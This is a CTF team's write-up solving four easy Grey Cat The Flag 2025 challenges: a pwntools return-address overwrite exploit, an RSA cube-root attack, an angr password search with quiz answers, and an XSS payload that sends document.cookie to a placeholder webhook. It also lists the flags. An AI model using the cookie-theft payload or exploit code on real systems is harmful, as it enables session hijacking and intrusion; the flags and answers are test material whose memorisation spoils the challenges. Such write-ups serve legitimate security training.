team-logo
Published on

Grey Cat The Flag 2025 - Ezpz challenges

Authors

Introduction

We solved all IziPizi ;) (4 of 4 tasks). These tasks weren't so easy, but short and clever. More info about this CTF is here

izipizi

Table of contents

BABY BYTES

baby bytes

Solution author: kerszi

from pwn import *

# Konfiguracja kontekstu
context.update(arch='x86_64', os='linux')
context.terminal = ['wt.exe', 'wsl.exe']
context.log_level = 'info'

# Informacje o hoście i pliku binarnym

HOST = "challs.nusgreyhats.org:33021"
ADDRESS, PORT = HOST.split(":")
BINARY_NAME = "./baby_bytes"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

# Uruchomienie procesu lokalnie lub zdalnie
if args.REMOTE:
    p = remote(ADDRESS, PORT)
else:
    p = process(binary.path)

# Funkcja do parsowania adresów z wyjścia programu
def get_addresses():
    p.recvuntil(b"Here's your address of choice (pun intended): ")
    choice_addr = int(p.recvline().strip(), 16)
    p.recvuntil(b"You need to call the function at this address to win: ")
    win_addr = int(p.recvline().strip(), 16)
    return choice_addr, win_addr

# Pobierz adresy
choice_addr, win_addr = get_addresses()
log.info(f"Choice address: {hex(choice_addr)}")
log.info(f"Win address: {hex(win_addr)}")

ret_addr = choice_addr+28   

# Funkcja do zapisu bajtu pod podanym adresem
def write_byte(addr, byte):
    p.sendlineafter(b"> ", b"2")  # Wybierz opcję zapisu
    p.sendlineafter(b"Enter the address of the byte you want to write to in hex:", hex(addr).encode())
    p.sendlineafter(b"Enter the byte you want to change it to:", hex(byte).encode())
    log.info(f"Writing byte {hex(byte)} to address {hex(addr)}")

# Rozbij adres funkcji win na bajty
win_bytes = p64(win_addr)  # Adres win w formacie little-endian

# Nadpisz adres powrotu bajt po bajcie
for i in range(8):  # 8 bajtów dla 64-bitowego adresu
    write_byte(ret_addr + i, win_bytes[i])

# Wyjdź z pętli, aby wywołać nadpisany adres powrotu
p.sendlineafter(b"> ", b"3")  # Wybierz opcję wyjścia

# Przełącz na tryb interaktywny, aby uzyskać powłokę
p.interactive()

grey{d1D_y0u_3njoY_youR_b4bY_B1tes?}

Tung Tung Tung Sahur

tung_tung_tung_sahur

Solution author: ppp45

from sympy import integer_nthroot

N = 140435453730354645791411355194663476189925572822633969369789174462118371271596760636019139860253031574578527741964265651042308868891445943157297334529542262978581980510561588647737777257782808189452048059686839526183098369088517967034275028064545393619471943508597642789736561111876518966375338087811587061841
C = 49352042282005059128581014505726171900605591297613623345867441621895112187636996726631442703018174634451487011943207283077132380966236199654225908444639768747819586037837300977718224328851698492514071424157020166404634418443047079321427635477610768472595631700807761956649004094995037741924081602353532946351
e = 3

c = C
c += N
c //= 2**164

pt, exact = integer_nthroot(c, e)
assert exact

flag = pt.to_bytes(99)
print(flag)

grey{tUn9_t00nG_t0ONg_x7_th3n_s4hUr}

Reversing 101

reversing101

Solution author: kerszi

First, find the password... Angr is your best friend.

import angr
import sys

def main(argv):
  path_to_binary = 'chal2'
  project = angr.Project(path_to_binary)
  initial_state = project.factory.entry_state()
  simulation = project.factory.simgr(initial_state)

  def is_successful(state):
    #Successful print
    stdout_output = state.posix.dumps(sys.stdout.fileno())
    return b'correct password! answer the quiz to get the flag.' in stdout_output

  def should_abort(state):
    #Avoid this print
    stdout_output = state.posix.dumps(sys.stdout.fileno())
    return b'incorrect password. try again.' in stdout_output

  simulation.explore(find=is_successful, avoid=should_abort)
  
  if simulation.found:
    solution_state = simulation.found[0]
    print(solution_state.posix.dumps(sys.stdin.fileno()))
  else:
    raise Exception('Could not find the solution')

if __name__ == '__main__':
  main(sys.argv)

Answer the quiz

from pwn import *             

context.update(arch='x86_64', os='linux') #
context.terminal = ['wt.exe','wsl.exe'] #

HOST="nc challs.nusgreyhats.org 33000"
ADDRESS,PORT=HOST.split()[1:]


BINARY_NAME="./chal"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

p = remote(ADDRESS,PORT)

p.sendlineafter(b"Question 1:",b'0x402db6')
p.sendlineafter(b"Question 2:",b'strlen')
p.sendlineafter(b"Question 3:",b'15')
p.sendlineafter(b"Question 4:",b"0xc1de1494171d9e2f")
p.sendlineafter(b"Question 5:",b"rc4")
p.sendlineafter(b"Question 6:",b"honk-mimimimimi")
p.interactive()

grey{solv3d_m1_f1r5t_r3v_ch4lleng3_heh3}

Oops

oops

Solution author: rvr

Just put the following XSS payload into URL Shortener form, shorten it and report.

javascript:fetch(`//<WEBHOOK.URL>?a=${document.cookie}`)
oops-webpage

grey{oops_wrong_variable}